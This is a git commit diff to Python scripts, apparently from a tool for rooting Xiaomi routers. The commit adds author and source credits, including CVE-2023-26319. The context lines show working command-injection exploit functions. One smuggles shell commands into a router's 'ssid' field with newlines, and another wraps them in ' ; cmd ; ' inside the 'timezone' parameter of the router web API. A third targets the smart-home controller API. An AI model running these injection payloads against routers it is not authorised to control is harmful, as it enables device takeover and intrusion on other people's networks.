connect: Update vulnerabilities and exploits info

connect2.py

@@ -41,6 +41,10 @@ stok = gw.web_login()
 
 
 def exec_cmd(cmd, api = 'API/misystem/set_config_iotdev'):
+    ######
+    # vuln/exploit author: LonGDikE
+    # publication: https://forum.openwrt.org/t/55049/62
+    ######
     params = { 'bssid': 'Xiaomi', 'user_id': '_username_', 'ssid': ('-h' + '\n' + cmd + '\n') }
     resp = gw.api_request(api, params)
     return resp

connect4.py

@@ -46,6 +46,10 @@ stok = gw.web_login()
 
 
 def exec_cmd(cmd, api = 'API/misystem/set_sys_time'):
+    ######
+    # vuln/exploit author: remittor
+    # publication: https://forum.openwrt.org/t/125008/132
+    ######
     resp = gw.api_request(api, { 'timezone': " ' ; " + cmd + " ; " })
     return resp
 

connect5.py

@@ -70,6 +70,11 @@ max_cmd_len = 100 - 1 - len(vuln_cmd)
 hackCheck = False
 
 def exec_smart_cmd(cmd, timeout = 7, api = 'API/xqsmarthome/request_smartcontroller'):
+    ######
+    # vuln/exploit author: Julien R. (SoEasY), Marin Duroyon
+    # reg_code: CVE-2023-26319
+    # publication: https://blog.thalium.re/posts/rooting-xiaomi-wifi-routers/
+    ######
     sc_command = cmd['command']
     payload = json.dumps(cmd, separators = (',', ':'))
     try: